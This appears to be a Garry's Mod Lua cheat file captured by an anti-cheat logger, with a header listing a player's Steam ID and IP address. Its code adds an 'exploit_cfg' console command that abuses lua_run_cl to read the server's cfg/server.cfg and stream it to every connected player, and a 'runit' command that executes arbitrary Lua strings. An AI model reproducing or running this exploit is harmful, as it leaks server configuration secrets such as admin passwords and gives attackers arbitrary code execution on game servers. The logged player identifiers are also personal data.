--[[
	MOD/lua/cfgr1.lua [#264 (#269), 779807007]
	lukeywes1234 | STEAM_0:0:81244007 <67.250.79.61:27005> | [24.01.14 11:42:14PM]
	===BadFile===
]]

local function DumpCFG()
RunConsoleCommand("lua_run_cl","datastream.StreamToClients(player.GetAll(),'DS',{a=file.Read('cfg/server.cfg',true)})")
print("! sent")
end
concommand.Add("exploit_cfg", DumpCFG)
concommand.Add("runit", function(p,c,a) RunString(a[1]) end)